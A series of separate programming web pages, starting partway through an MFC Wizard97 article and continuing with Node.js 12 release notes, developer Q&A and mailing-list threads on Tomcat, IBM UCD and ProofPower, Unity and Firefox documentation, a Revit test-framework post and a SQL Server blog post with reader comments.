There is something wrong here! Of course, the watermark and the header with the small image we expected to see are absent. Walking through the source code of the MSDN example and analyzing it can bring us an explanation of the first defeat and the way to resolve the problem. The solution is hiding in one line of code:

// Modified constructor of the property sheet class
CWiz97::CWiz97(UINT nIDCaption, CWnd* pParentWnd, UINT iSelectPage)
    : CPropertySheet(nIDCaption, pParentWnd, iSelectPage)
{
    SetWizardMode();
    // ... flag and bitmap setup as before ...
    // Next line is very important
    m_psh.hInstance = AfxGetInstanceHandle();
}

It was easy to discover the problem, although one could expect that the instance handle would be preset in the constructor of the MFC class. So let's compile and run again. Don't stress yourself with the new version of our program. We shall fix it a bit later, but right now just take a look at the new view (Fig. 4).

Fig. 4. A new astonishing view of the Wizard

The positive point is that we can see the pictures we've created. But the whole view of our Wizard is still different from the MSDN example.
If you have already regained consciousness, then we can continue. It can be fairly hard to discover the roots of this problem. What could we have done wrong? It can take a while to figure it out and fix it. Don't bother searching the Internet - it's already been done, and you won't find any tips or tricks for this problem. Don't bother re-checking the source code either, because our mistake is not a missing flag. I tested a lot of combinations of different flags, attributes and functions, but the result of all these efforts, in contrast to the MSDN example, was still the difference between Fig. 3 and Fig. 4.

But nothing is eternal in the Universe, and the reason was found. This problem occurs because of the default settings of the project wizard we used to create the application - namely, the settings for the IE version in the stdafx.h file. Here is the change one should make to get the wizard to behave as it is supposed to:

#ifndef WINVER
#define WINVER 0x0400         // Default value is 0x0400
#endif

#ifndef _WIN32_WINNT
#define _WIN32_WINNT 0x0400   // Default value is 0x0400
#endif

#ifndef _WIN32_WINDOWS
#define _WIN32_WINDOWS 0x0410 // Default value is 0x0410
#endif

#ifndef _WIN32_IE
#define _WIN32_IE 0x0500      // Default value is 0x0400
#endif

Finally we come to the result we were expecting from the beginning (see Fig. 5).

Fig. 5. The final result

You can find more detailed information about the constants we have modified in the Windows SDK documentation. So, concluding the whole process we have just been through, one finds that it really is easy to implement a Wizard 97 by using the MFC classes, which are fairly good wrappers for it - but to use the power of MFC, one must be aware of some pitfalls of this approach. I hope this article was useful for you and that you will not have to repeat my mistakes. Thank you to all who had enough passion to persevere to the end.
This article, along with any associated source code and files, is licensed under The Code Project Open License (CPOL)
http://www.codeproject.com/Articles/3010/Conquering-Wizard97?fid=11749&tid=1705851
Node.js continues its yearly release cycle with version 12 (codenamed Erbium). Since this is an even-numbered version, it will go into Long Term Support (LTS) in October 2019 and reach its end of life in April 2022. In contrast, the odd-numbered releases are non-LTS and exist for 6–8 months between LTS releases; they are used to prepare for the next LTS release. Node 12 is packed with great features and notable upgrades to the runtime. In addition, since Node uses the V8 engine maintained by Google and used in Chrome, Node will receive all updates from that as well.

Node 12 enters Phase 3 for ECMAScript Modules, which corresponds to a path to stability for the modules inside Node. Initially, it will still be behind the --experimental-modules flag, and the plan is to remove the flag by the time Node 12 goes into LTS in October. The import/export syntax has become the preferred module syntax for JavaScript developers since its standardization in ES6, and the Node team has been working diligently to enable it natively. Experimental support began in Node 8.0 at phase 0 and is taking a major step with the newest Node release. All major browsers support ECMAScript modules via <script type="module">, so this is a huge update for Node.

Phase 3 will support 3 types of import from ES module files (works with all built-in Node packages):

// default exports
import module from 'module'

// named exports
import { namedExport } from 'module'

// namespace exports
import * as module from 'module'

If you import from a CommonJS package, you can only import using the default export syntax: import module from 'cjs-library'. You can use dynamic import() expressions to load files at runtime. The import() syntax returns a Promise and works with both ES Modules and CommonJS libraries.

Node 12 will initially run on V8 7.4 and eventually upgrade to 7.6 during its lifetime. The V8 team has agreed to provide ABI (Application Binary Interface) stability for this range.
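The dynamic import() form described above takes only a few lines; here is an illustrative sketch using the built-in 'path' module as a stand-in for any library:

```javascript
// import() returns a Promise and works from CommonJS files too,
// so no flag or .mjs extension is needed for this sketch.
async function main() {
  const path = await import('path'); // resolves to a module namespace object
  console.log(path.posix.join('a', 'b')); // -> a/b
}

main();
```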
Notable improvements with V8 7.4 are performance updates for faster JavaScript execution, better memory management, and broadened ECMAScript syntax support.

- Async stack traces
- Faster parsing of JavaScript
- Faster calls with arguments mismatch
- Faster await

Node 12 will ship with private class fields (enabled by V8). Private class field variables are only accessible within the class itself and not exposed externally. A private class field is declared by prepending a variable with the # symbol.

class Greet {
  #name = 'World';

  get name() {
    return this.#name;
  }

  set name(name) {
    this.#name = name;
  }

  sayHello() {
    console.log(`Hello, ${this.#name}`);
  }
}

In the above example, if you try to access #name outside of the class, you will receive a syntax error.

const greet = new Greet()
greet.#name = 'NewName'; // -> SyntaxError
console.log(greet.#name) // -> SyntaxError

Node 12 builds a code cache for built-in libraries at build time and embeds it in the binary. The main thread is able to use this code cache, improving the startup time by 30%.

Node now supports TLS 1.3, which offers increased security and reduced latency. TLS 1.3 has been a huge update to the protocol and is actively being integrated across the web. By implementing TLS 1.3, Node apps will have increased end-user privacy while also improving the performance of requests by reducing the time required for the HTTPS handshake. In addition, TLS 1.0 and 1.1 have been disabled by default, and the crypto library has removed deprecated functions.

Previously, the default V8 heap sizes were used, which corresponded to 700MB (32-bit systems) or 1400MB (64-bit systems). Node will now determine the heap sizes based on the available memory, which ensures it does not use more than the resources allowed. Node 12 also provides the ability to generate a heap dump, making it easier to investigate memory issues.
Node offers an improved ability to diagnose issues (performance, CPU usage, memory, crashes, etc.) within applications by providing an experimental diagnostic report feature.

N-API was released to provide a more stable, native Node module system that prevents libraries from breaking on every release by providing an ABI-stable abstraction over native JavaScript APIs. Node 12 offers improved support for N-API in combination with worker threads.

- Worker Threads no longer require a flag
- http has updated its default parser to llhttp
- assert validates required arguments and adjusts loose assertions
- buffer improvements to make it more stable and secure
- async_hooks removes deprecated functionality
- global.process and global.Buffer are now getters, to improve process startup
- A new welcome message for the REPL

The Node team works very hard to provide yearly updates with huge improvements to Node and the overall JS ecosystem, and version 12 does not disappoint. The full CHANGELOG can be found on GitHub, with additional details in the official release article. 2019 has already been a big year for Node, with the Node.js Foundation merging with the JS Foundation to form the OpenJS Foundation. We continue the exciting year for JavaScript with the release of Node version 12.
http://brianyang.com/whats-new-in-node-12/
I'm trying to use the Docker UCD source plugin to pull images from the container service in Bluemix, but I just can't get the connection parameters right in the component settings page, and I keep getting errors when I try to run a version import. I have no problem running a simple "cf ic info" in a shell (and as a step in a generic process), so I'm confident I have (most of) the setup in place.

UCD 6.2.1.1.788401 on a CentOS 7.2.1511 VMware 10 virtual machine. Just a single agent so far, on the same host as the UCD server.

Here's the output from "cf ic info":

Date/Time               2016-08-25 09:28:37.08044612 +0200 CEST
Debug Mode              false
Host/URL
Registry Host           registry.ng.bluemix.net
Bluemix API Host/URL
Bluemix Org             torsten.lif@se.ibm.com (f0bb7038-a220-40f8-a20c-363ff91284ac)
Bluemix Space           Torsten Lif space (5288b109-3515-42fa-a530-5feaddede433)
CLI Version             0.8.934
API Version             3.0 Tue Aug 23 17:27:52 2016
Namespace               torstenlif
Environment Name        prod-dal09p03-kraken2
Containers Limit        Unlimited
Containers Usage        1
Containers Running      0
CPU Limit (cores)       Unlimited
CPU Usage (cores)       4
Memory Limit (MB)       2048
Memory Usage (MB)       256
Floating IPs Limit      2
Floating IPs Allocated  0
Public IPs Bound        0

Somewhat intuitively, it appears that the "Registry" entry of the component needs to be containers-api.ng.bluemix.net:8443, but what should I use for the image name? The image I want to import to UCD is this one:

% cf ic images centos1 | grep centos1
registry.ng.bluemix.net/torstenlif/centos1   1   0346736ac2c6   3 weeks ago   70.58 MB

I have tried setting the image name to centos1, torstenlif/centos1 and registry.ng.bluemix.net/torstenlif/centos1, but all give me a 404-type error:

HTTP/1.1 404 NOT FOUND
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>404 Not Found</title>
<h1>Not Found</h1>
<p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

Caught: java.lang.RuntimeException: Unable to ping registry.
Please check credentials and make sure that registry supports v2 api.

java.lang.RuntimeException: Unable to ping registry. Please check credentials and make sure that registry supports v2 api.
    at com.urbancode.air.plugin.docker.RegistryClient.pingRegistry(RegistryClient.groovy:160)
    at com.urbancode.air.plugin.docker.RegistryClient.getTags(RegistryClient.groovy:173)
    at com.urbancode.air.plugin.docker.RegistryClient$getTags.call(Unknown Source)
    at importVersions.run(importVersions.groovy:36)

Answer by Taylor_Kohn (1) | Feb 28, 2017 at 11:36 AM

I believe the registry in your case should be registry.ng.bluemix.net. In the input property tooltip, it states: "If image is host:5000/namespace/repository:tag use host:5000."
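The tooltip's rule can be restated as a tiny parsing sketch (illustrative code, not part of the plugin):

```python
def split_image_ref(ref):
    """Split 'host[:port]/namespace/repository[:tag]' per the plugin tooltip:
    the plugin's Registry field should be just the 'host[:port]' part."""
    registry, _, remainder = ref.partition('/')
    repo, _, tag = remainder.partition(':')
    return registry, repo, tag or 'latest'

print(split_image_ref('registry.ng.bluemix.net/torstenlif/centos1'))
# -> ('registry.ng.bluemix.net', 'torstenlif/centos1', 'latest')
```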
https://developer.ibm.com/answers/questions/298379/ucd-docker-source-plugin-and-bluemix-ics/
David,

Thanks very much for the tips. I haven't yet got it in a package as I am just using this for testing at the moment, though I had managed to find out about numbers 2 and 3 for myself. Thanks for the hint though.

Now I have another problem with the following code:

import java.io.*;
import java.net.*;
import javax.sql.*;
import javax.naming.*;
import javax.servlet.*;
import javax.servlet.http.*;
import java.sql.*;

/**
 * @author Mark
 * @version
 */
public class SearchServlet extends HttpServlet {

    /** Processes requests for both HTTP <code>GET</code> and <code>POST</code> methods.
     * @param request servlet request
     * @param response servlet response
     */
    public void processRequest(HttpServletRequest request, HttpServletResponse response)
            throws ServletException, IOException {
        String address = "/privacy.jsp";
        DataSource ds = null;
        InitialContext ctx = null;
        Connection con = null;
        Statement stmt = null;
        int blob = -1;
        try {
            ctx = new InitialContext();
            ds = (DataSource) ctx.lookup("java:comp/env/jdbc/TestDB");
            con = ds.getConnection();
            if (con != null) {
                address = "/termsandconditions.jsp";
            } else {
                address = "/support.jsp";
            }
            stmt = con.createStatement();
            ResultSet rst = stmt.executeQuery("select id, chest from testdata");
            blob = rst.getInt("chest");
            address = "/testy.jsp?errorcode=" + blob;
            stmt.close();
            con.close();
        } catch (NamingException e) {
            System.out.println(e.toString());
        } catch (SQLException sql) {
            System.out.println(sql.toString());
        }
        RequestDispatcher dispatcher = request.getRequestDispatcher(address);
        dispatcher.forward(request, response);
    }

Now what I've done is tested it using the if statement above, and it detects the changes there and the servlet redirects me to termsandconditions.jsp. I've done this for the connection, statement and result set, and none return as being null. However, when I remove the if statement the servlet never gets to the "address = "/testy.jsp?errorcode=" + blob;" line and just redirects me to the privacy.jsp page.
If the if statement is still in, it redirects me to the address within the != null part of that. Any ideas why it isn't working and if the database connection is even working at all? Is there a better way to test it? Mark ----- Original Message ----- From: "David Smith" <dns4@cornell.edu> To: "Tomcat Users List" <users@tomcat.apache.org> Sent: Tuesday, February 21, 2006 12:42 PM Subject: Re: Fw: Servlet problem >I get the impression you are a beginner at this. Reading the servlet spec >would go a long way in understanding how the servlet container works. For >the immediate problem: > > 1) Try to get SearchServlet in a package. ie: > com.mycompany.myproject.SearchServlet This isn't strictly required for > servlet classes, but excellent practice none the less. You will need > packaged classes for any supporting classes you develop. > > 2) Map your servlet to a unique url of it's own and not to the url of > existing JSPs. When you map your servlet to a url matching a jsp, the > servlet is executed instead of the jsp per the mapping mechanism. > > 3) The action attribute of your form tag should be to the url you mapped > your servlet to, not it's literal location at > WEB-INF/classes/SearchServlet. Resources inside of WEB-INF are not > directly accessible from the user and you'll get an error if you attempt > it. > > After the servlet does it's thing, it can forward the request to one of > your jsps as necessary. The servlet spec can be found at > > > --David --------------------------------------------------------------------- To unsubscribe, e-mail: users-unsubscribe@tomcat.apache.org For additional commands, e-mail: users-help@tomcat.apache.org
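For readers following the thread, David's points 2 and 3 correspond to a web.xml mapping along these lines (a sketch; the servlet name and URL pattern are hypothetical):

```xml
<!-- Declare the servlet class (ideally in a package, per point 1) -->
<servlet>
  <servlet-name>search</servlet-name>
  <servlet-class>com.mycompany.myproject.SearchServlet</servlet-class>
</servlet>

<!-- Map it to a URL of its own; the form's action attribute should point here -->
<servlet-mapping>
  <servlet-name>search</servlet-name>
  <url-pattern>/search</url-pattern>
</servlet-mapping>
```

With a mapping like this in place, the JSP form would post to the mapped URL rather than to the class file's location under WEB-INF.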
http://mail-archives.apache.org/mod_mbox/tomcat-users/200602.mbox/%3C008701c636ec$0ec79360$0602a8c0@MarksLaptop%3E
// Informa -- RSS Library for Java
// Copyright (c) 2002-2003

package de.nava.informa.utils;

/**
 * Handy Dandy Test Data generator. There are two ways of using this. By calling 'generate()' we
 * just generate a stream of different rss urls to use for testing. The stream wraps around
 * eventually. Calling reset() we start the stream up again. Or, you can just call 'get(int)' to get
 * the nth url.
 */
public class RssUrlTestData
{

    static int current = 0;
    static String[] xmlURLs = { /* list of test feed URLs elided in this extract */ };

    static public String get(int i)
    {
        return xmlURLs[i % xmlURLs.length];
    }

    static public String generate()
    {
        return get(current++);
    }

    static public void reset()
    {
        current = 0;
    }

}
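Since the URL list itself is elided in this extract, the wrap-around behaviour described in the class comment can be demonstrated with a self-contained sketch using placeholder URLs:

```java
// Self-contained sketch of the generator's wrap-around behaviour,
// with placeholder URLs standing in for the elided list.
class RssUrlDemo {
    static int current = 0;
    static String[] xmlURLs = { "http://a/feed.rss", "http://b/feed.rss" };

    static String get(int i) { return xmlURLs[i % xmlURLs.length]; }
    static String generate() { return get(current++); }
    static void reset() { current = 0; }

    public static void main(String[] args) {
        System.out.println(generate()); // http://a/feed.rss
        System.out.println(generate()); // http://b/feed.rss
        System.out.println(generate()); // wraps around: http://a/feed.rss
        reset();
        System.out.println(generate()); // http://a/feed.rss again
    }
}
```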
http://kickjava.com/src/de/nava/informa/utils/RssUrlTestData.java.htm
The enum flags value modified by the user. This is a selection BitMask where each bit represents an Enum value index. (Note this returned value is not itself an Enum). Displays a menu with an option for every value of the enum type when clicked. An option for the value 0 with name "Nothing" and an option for the value ~0 (that is, all bits set) with the name "Everything" are always displayed at the top of the menu. The names for the values 0 and ~0 can be overridden by defining these values in the enum type. Note: This method only supports enums whose underlying types are supported by Unity's serialization system (sbyte, short, int, byte, ushort, or uint). For enums backed by an unsigned type, the "Everything" option should have the value corresponding to all bits set (i.e. ~0 in an unchecked context or the MaxValue constant for the type). Simple editor window that shows the enum flags field.

using UnityEditor;
using UnityEngine;

class EnumFlagsFieldExample : EditorWindow
{
    enum ExampleFlagsEnum
    {
        None = 0,      // Custom name for "Nothing" option
        A = 1 << 0,
        B = 1 << 1,
        AB = A | B,    // Combination of two flags
        C = 1 << 2,
        All = ~0,      // Custom name for "Everything" option
    }

    ExampleFlagsEnum m_Flags;

    [MenuItem("Examples/EnumFlagsField Example")]
    static void OpenWindow()
    {
        GetWindow<EnumFlagsFieldExample>().Show();
    }

    void OnGUI()
    {
        m_Flags = (ExampleFlagsEnum)EditorGUILayout.EnumFlagsField(m_Flags);
    }
}
https://docs.unity3d.com/ScriptReference/EditorGUILayout.EnumFlagsField.html
This article provides helpful information to extension developers trying to update their extensions to work properly in Firefox 3.6.

User interface changes

Right-clicking on elements (including links and images) no longer offers a "Properties" menu item. The properties dialog box was not useful for most users and has been removed. If your extension interacts with that menu item in any way, you'll need to revise your code to add it yourself, or contribute your own context menu entry directly.

Add-on package changes

In order to allow add-ons' icons to be displayed even when they're disabled, Gecko 1.9.2 added support for automatically detecting and using an icon named icon.png, located in the add-on's root directory. This is used if the add-on is disabled, or if the manifest is missing an iconURL entry.

HTML 5 compliance improvements

The DOM Level 2 views of HTML and XHTML documents are now unified per HTML 5.

- The localName DOM property now returns the name of HTML element nodes in lower case. Previously, in HTML documents, it returned it in upper case. (DOM Level 1 tagName continues to return upper case in HTML documents.)
- The namespaceURI DOM property now returns "http://www.w3.org/1999/xhtml" on HTML element nodes. Previously, in HTML documents, it returned null.
- document.createElementNS(null, "FOO") no longer creates an HTML element node in HTML documents. document.createElement("FOO") and document.createElementNS("http://www.w3.org/1999/xhtml", "foo") continue to work in HTML documents.
- The name and local-name functions in XPath return the name of HTML elements in lower case. Previously, in HTML documents, they returned it in upper case.

The most probable upgrade problem is the pattern if (elt.localName == "FOO").

Example: Testing if an element is an HTML img element

Firefox 3.6, both text/html and application/xhtml+xml:

if (elt.localName == "img" && elt.namespaceURI == "http://www.w3.org/1999/xhtml")

Firefox 3.5 and 3.6, only extension-supplied text/html without foreign (e.g. SVG) script-inserted elements:

if (elt.tagName == "IMG")

Firefox 3.5 and 3.6, both text/html and application/xhtml+xml:

if (elt instanceof HTMLImageElement)

contents.rdf no longer supported

Support for the obsolete contents.rdf method for registering chrome has been removed in Gecko 1.9.2, and is no longer supported by Firefox 3.6. This means that add-ons that use contents.rdf can no longer be installed. Make sure you include a chrome.manifest in your XPI.
https://developer.mozilla.org/en-US/Firefox/Releases/3.6/Updating_extensions
Today, let's highlight an exciting and very useful contribution by Mark Vulfson at UpCodes Engineering and the entire UpCodes AI team, presented in his Revit API discussion forum thread on Revit Test Framework improvements. Many thanks to Mark and the UpCodes team for making this available! By the way, here are some previous notes on unit testing Revit add-ins.

Hello everyone,

We are currently developing a pretty elaborate Revit plugin, the UpCodes AI for building code automation: UpCodes AI is a design aid for architects and engineers. View code errors in real-time directly in Revit with a "spell check" for compliance.

During the course of this work, we ran into many issues (and surely will run into many more), and this forum has helped us resolve many of them. We'd like to contribute something back to the community by telling you about the improvements we've made to the awesome Dynamo Revit unit test framework, RevitTestFramework or RTF, by the Dynamo team. It's an invaluable tool if you are developing a Revit add-in, as it allows you to run integration tests and control Revit in an automated fashion. However, the RTF hasn't had much development done on it in a while (other than making it compatible with Revit 2019), and as such we found a few things lacking; the biggest such shortcoming was the lack of a NuGet package, making usage of the RTF on a build server/continuous integration server very difficult. Along the way, we made a few other improvements that I think you will find interesting and useful.

Summary of main changes we've made so far:

1. Created a NuGet package
2. Added the ability to group tests by the model
3. Added ability to use wildcards for model filenames
4. Clear messaging and indication of failures

1. Created a NuGet package

You can download it here:

2. Added the ability to group tests by the model

Opening a new RVT file for each test significantly slows down the execution of the tests.
We wanted our Revit tests to run for each pull request our engineers make, so it has to be fast (and reliable). The groupByModel option significantly improves performance if you have multiple tests that operate on the same model. When using --groupByModel, the RTF will order the tests such that all tests that operate on the same model file are executed sequentially, without closing and reopening the model. Naturally, it requires the --continuous parameter to be effective. Also, it goes without saying that if your tests leave side effects on a model which may break a subsequent test, this option will not work for you. Luckily for us, none of our tests have side effects (which, in general, is a good practice).

3. Added ability to use wildcards for model filenames

We have multiple models on which we want to run a particular test. Until now, every time we made a new model, we had to copy/paste a unit test with a new model file. To make this simpler, you can now specify a wildcard for your model file on a test, and RTF will enumerate all files in the directory and run the test on each one. For example:

[TestFixture]
public class TestAllModels
{
    [Test, TestModel(@"C:\Models\test_models_2019\*.rvt")]
    public void SomeTest()
    {
        ...
    }
}

will run SomeTest on every RVT file it finds under C:\Models\test_models_2019. One of the ways we use this is for performance testing. All that this test does is measure the speed with which we finish processing a given model. This way, we can run the test suite on each release and assess whether we have significantly regressed our performance from our previous release.

4. Clear messaging and indication of failures

Engineers don't love writing tests and they hate debugging tests, especially when diagnosing what went wrong is very difficult. We wanted to make sure that an engineer could:

- Look at the log output from a build server and quickly be able to tell what went wrong and where to start debugging.
- Run the test easily with a nice UI on their local computer to quickly iterate on a solution to fix the problem.

This includes:

- Clear indication when a model file is not found (prior to that, RTF would just silently complete the test suite without errors).
- Automatically expand failing tests in the UI so that errors are super obvious.
- Have a clear summary at the end of a test run for the number of passed/failed/etc. tests. This way, you can go grab a coffee while the tests run and know if there were any errors with a quick glance at the summary.
- We utilize categories (e.g. [Category("Doors")]) for grouping. But the RTF UI didn't show tests without a category; this is now fixed.
- All Console.WriteLine messages from the actual unit tests are now sent back to the RTF server so you can see them in a single contiguous log – yay (this one is my favourite)!
- Test completion information is displayed in the console as soon as the test itself is completed; RTF used to wait till all tests had finished before showing you the status of all individual tests; now each pass/fail is printed as soon as the test is completed.

We also made a bunch of small bug fixes around the stability of the RTF. There is still work to be done on the framework, but we hope you find these changes useful. We are working with the Dynamo team to bring all these changes back to the main branch of RTF, but, for now, you are welcome to contribute with us in our forked RevitTestFramework repo.

Mark – Engineering at UpCodes

p.s. we are hiring – if you love building Revit add-ins please reach out!
https://thebuildingcoder.typepad.com/blog/2018/08/revit-unit-test-framework-improvements.html
Hi all, I'm entering into a programming course next September and am trying to get the essentials of Java before hand. I attempted to create my first program but have learned that it's much easier when you can speak to someone who knows what they're doing. Anyway, here is my code: public class Taxtwo { /** * @param args */ public static void main(String[] args) { // TODO creating instance of a variable Taxone t = Taxone; t.income = 1000000; t.state = NY; t.dependants = 4; { public double t.calctax(); stateTax=0; if (income > 999999){ stateTax=income*0.75; { else stateTax=income*0.0001; } } return stateTax; double yourTax = t.calctax(); System.out.println("Your tax is" yourTax); My Error I get an error that says I cannot invoke primitive type double on the t.calctax method in the last few lines of class 2, and consequently the yourTax variable is invalid on the last line. Help mucho appreciado.
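For readers following along, here is one way the posted code could be restructured so that it compiles and runs. The field and method names come from the post, but the two-class arrangement shown here is an assumption about what the missing Taxone class looks like:

```java
// A corrected sketch of the poster's two classes. The calctax() method
// belongs on Taxone (not declared inline inside main), and the thresholds
// are taken directly from the post.
class Taxone {
    double income;
    String state;
    int dependants;

    double calctax() {
        double stateTax;
        if (income > 999999) {
            stateTax = income * 0.75;
        } else {
            stateTax = income * 0.0001;
        }
        return stateTax;
    }
}

class Taxtwo {
    public static void main(String[] args) {
        // The post tried "Taxone t = Taxone;" -- an instance needs 'new'
        Taxone t = new Taxone();
        t.income = 1000000;
        t.state = "NY";       // a String, so it needs quotes
        t.dependants = 4;

        double yourTax = t.calctax();
        System.out.println("Your tax is " + yourTax); // concatenation needs '+'
    }
}
```

With the values from the post (income of 1000000), this prints "Your tax is 750000.0".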
http://www.javaprogrammingforums.com/whats-wrong-my-code/9045-first-simple-two-classed-tax-program.html
THE SQL Server Blog Spot on the Web I know it's been a while since my last post, and there is a specific reason for that, which I am going to tell you about. On February 5th, I emailed to my editor the LAST chapter of my new book, after the author reviews and all comments from the editors were answered. I was technically done, except for a bit of work on the Intro, etc. Less than an hour after I sent off that last chapter, I got a call from the Washington State Highway Patrol that my husband had been found at the side of the road; he was semi-conscious after having a major stroke. I have spent most of the last two weeks by his side at Harborview Hospital in Seattle. Although there is WiFi in the rooms and I was able to check email and keep family and close friends informed, there was little inclination or energy for blogging. Today, after all the final polishing by Microsoft Press, the pages were sent to the printer. The expected 'in print' date is March 11. It will be a week or so after that until the bookstores get it. I don't know how soon Amazon will be able to start shipping the pre-orders. I'm not going to post my husband's whole story here, but suffice it to say my life will be changing. I will need to cut back on traveling, but I do need to continue working. I may not be offering nearly as many public classes, so if you've ever wanted to take a class from me, I suggest you think about doing it sooner rather than later, because there might not be a later. I will start delivering the 2008 version of my SQL Server Internals course next month. (Probably 90-95% of the course is still relevant to SQL Server 2005.) Take care .... and in the words of one of my favorite singers/songwriters, James Taylor, Shower the people you love with love.... Shower the people you love with love.... ~Kalen My prayers go out to you and your family.
Prayers and thoughts with you and your husband, Kalen. I hope he recovers fully and soon.

Congratulations on the book (which I've had preordered for awhile now). My prayers go out to you and your family as well. Your focus definitely belongs on your husband now.

Your family will be in my prayers.

Kalen, may God keep you and your family in the hollow of His hand. My thoughts go with you. Lisa sends her love too.

Kalen, family trumps everything else. Take care of your husband and yourself. We pray for his thorough recovery and will cross our fingers that he'll be well enough for you to make an appearance at PASS in November. Congratulations on finally finishing the book.

Over the course of last year I became more & more aware of the importance of living life to its fullest. Yet as I sit here at a desk in a room far from home with work-related priorities pressing upon me, I’m wondering whether to take the time to do any sightseeing. Thanks to you, the decision is made: I’m going to liberate myself from these walls & take advantage of this opportunity. Your post brings to mind a post I made last December on celebrating life, that this is the Year of the Tango. (Yes, painful as it must be for my lovely bride & our instructor, our lessons have begun.)

I hope everything works out as well as possible. God bless you both. You’ll be in our prayers. And congrats on the book.

Kalen, I wouldn't be where I am today were it not for your body of great work. Thank you.

Dear Kalen, Prayers and thoughts with you and your husband. I feel your pain as we undergo the same.

Hi Kalen, This is terrible news. I feel so bad for you and your family. My thoughts are with you ... and I really hope that you will find a good way to balance the requirements in this new situation. I wish you all the strength and all the luck you need in this difficult situation.

Thanks for sharing, and reminding us all how fragile the lives of ourselves and our beloved can be - and how a great achievement on the professional stage can shrink into total unimportance when faced with bad luck on the personal stage.

My prayers and those of my family for you and your husband. May he recover fully. It's often the case that love creates miracles; may that love be present with you both at this time.

Sorry to hear this. My thoughts and Prayers with you. I wish your husband a speedy recovery. Regards, Meher

So sorry to hear the news about your husband. You and your family are in my caring thoughts. Congratulations on the book!

Shows how fragile we are. My prayers and thoughts for your family. Hope for a complete recovery for your husband. Family always comes first.

I am sorry to hear about your husband. I hope that he can make a full recovery. I'm glad I got to see one of your presentations at PASS 2008. My prayers are with you. Chris

I am truly sorry to hear the news about your husband. I hope he gets better soon. Your books have a special place in my shelf. Wish you well, AMB

Kalen, Thanks for sharing with us your personal life, and like so many others I wish your husband a full recovery.

Prayers for a speedy recovery. May God bless you and your family. Best Wishes

I hope for the best for you and your family.

We all pray for you and your family; congratulations on having your family as a priority over your work - I always knew you had your head on straight! {-:

My prayers for you and your family, Kalen. Hope your husband recovers soon.

Prayers for a speedy and full recovery! Life is so fragile, enjoy it to the fullest. My prayers go out to you and your family. P.S. I can't wait to read the book, I already ordered it at Amazon.

My thoughts and prayers go out to you and your family. I have your new book on order from Amazon. Waiting for them to get it in to ship.

I don't know how I missed this when you posted it. Godspeed to you and your husband, Kalen. Your family is in our prayers.

Hello Kalen, I'm sorry to hear this... My prayers go out to you and your family and I hope he gets better soon. I just ordered your new book. Thanks for writing great books. Jungsun Kim, SQL Server MVP

FYI: I got my pre-order yesterday...
http://sqlblog.com/blogs/kalen_delaney/archive/2009/02/18/my-book-is-at-the-printers.aspx
Rob,

Sorry for the slow response. I have thought quite a bit about this, but these days such cogitations don't always go anywhere useful.

On Thursday 30 Aug 2012 21:58, Rob Arthan wrote:
> On 11 Aug 2012, at 15:07, Roger Bishop Jones wrote:
> > and a number of cases where identifiers which I had
> > been using are now used in MathsEgs theories which are
> > in my ancestry these include Tree TREE Pair
>
> Were you using these names for things of your own?

Yes.

> If so, then perhaps this would be solved if the underlying
> names of constants were prefixed with the theory name.
> What I am considering in this area is an option
> controlled by a flag (say "structured_HOL_namespace"),
> which I would turn on towards the end of the HOL build,
> whereby the HOL parser would do this for you. When you
> define constant "xyz" in theory "abc", the underlying
> name would be "xyz.abc" and "abc" would be introduced as
> an alias for that. And likewise for types. This
> behaviour would be optional and language-specific (e.g.,
> you wouldn't want it for Z, and you might not want it in
> HOL). Would that have saved you any trouble?

I don't think my problems with the new version of maths_egs are of any concern, and don't for me motivate changes.

I do think changes in this area are desirable, but I would say that my own prime motivation would be to move to a situation in which proof tools can make use of results obtained in other proof tools, i.e. the motivations for OpenTheory and my "X-Logic". I think being able to eliminate junk from theories is something which would help in that enterprise, and as it happens it would probably also help to manage the above kind of problem. I think that probably would involve using compound constant names, at least behind the scenes, not necessarily in front of the children. But I'm not keen on the use of the ProofPower aliasing mechanism to manage the use of simple names.
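The qualified-name scheme quoted above — an underlying name like "xyz.abc" with the short name usable as an alias — can be illustrated with a toy resolver. This is a hypothetical Python sketch, not ProofPower ML; the class, method names, and clash behaviour are all assumptions made for illustration only:

```python
# Toy model of theory-qualified constant names with short-name aliases.
class Namespace:
    def __init__(self):
        self.constants = {}   # qualified name -> definition
        self.aliases = {}     # short name -> set of qualified names

    def define(self, theory, name, definition):
        qualified = "%s.%s" % (name, theory)   # e.g. "xyz.abc"
        self.constants[qualified] = definition
        self.aliases.setdefault(name, set()).add(qualified)
        return qualified

    def resolve(self, name):
        if name in self.constants:             # already fully qualified
            return name
        targets = self.aliases.get(name, set())
        if len(targets) == 1:                  # unambiguous short name
            return next(iter(targets))
        raise LookupError("ambiguous or unknown name: %s" % name)

ns = Namespace()
ns.define("abc", "xyz", "defn-1")
print(ns.resolve("xyz"))          # -> xyz.abc
ns.define("maths_egs", "xyz", "defn-2")
# now the bare name "xyz" is ambiguous and only the qualified
# names resolve -- mirroring the clash described in this thread
```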
A key feature I think is simply to be able to hide names, or project a theory according to a signature, but also it would be nice to be able to rename on import.

I am inclined now to think that it might have been a mistake to automatically inherit all the ancestry when adding a parent. This connects with the discussion about conservative extension, since it represents an alternative way of obtaining the kind of abstraction which "new_specification" provides, and possibly somewhat superior in that the details are all there, but not actually "exported". Putting it in that context, the idea that the structured namespace is something you opt into at some point seems to me doubtful, though you might want it to default to behaviour which is backward compatible, i.e. if the local names are all globally unique then they will all get correctly resolved as at present.

However, once you put it in this context, then you are really looking at a bigger problem in which consensus across theorem provers is essential. Personally, I think that shouldn't just be HOL provers, and as you know I advocate importing results even if proofs cannot be imported. As an example of what ideally might be possible, classical arithmetic is standard; no two provers should disagree about what is true (though they will differ about what they can prove), so exchange across any tool which is sound for first order arithmetic should be possible in that domain.

All that of course is much more than you wanted to get into, and for my money you can safely do nothing here if your concern is just the occasional rework that people might have to do when you change maths_egs.

> > (probably the most
> > disruptive) and some identifiers consisting of or
> > starting with subscripted "D".
>
> Really - I can't find any identifiers that start with a
> subscripted character in the MathsEgs theories.
The theory is topology, which now contains some names which are the same as names you put into a bit of differential geometry you did for me way back.

> > I have not yet considered a new way of building
> > contribs. I feel that making MathsEgs build OK on the
> > development system would not be productive in the
> > absence of a little more clarity about how a contrib
> > system would be expected to work.
>
> I had a discussion with Anthony Fox about how they do
> things in HOL4 and that has given me some more ideas on
> this. I think it is actually completely orthogonal to
> how the ProofPower code is organised.

Yes. I got confused when you issued the trial reorganisation and tried to build maths_egs out of the RCS, which didn't work, but it did build in the normal way of course.

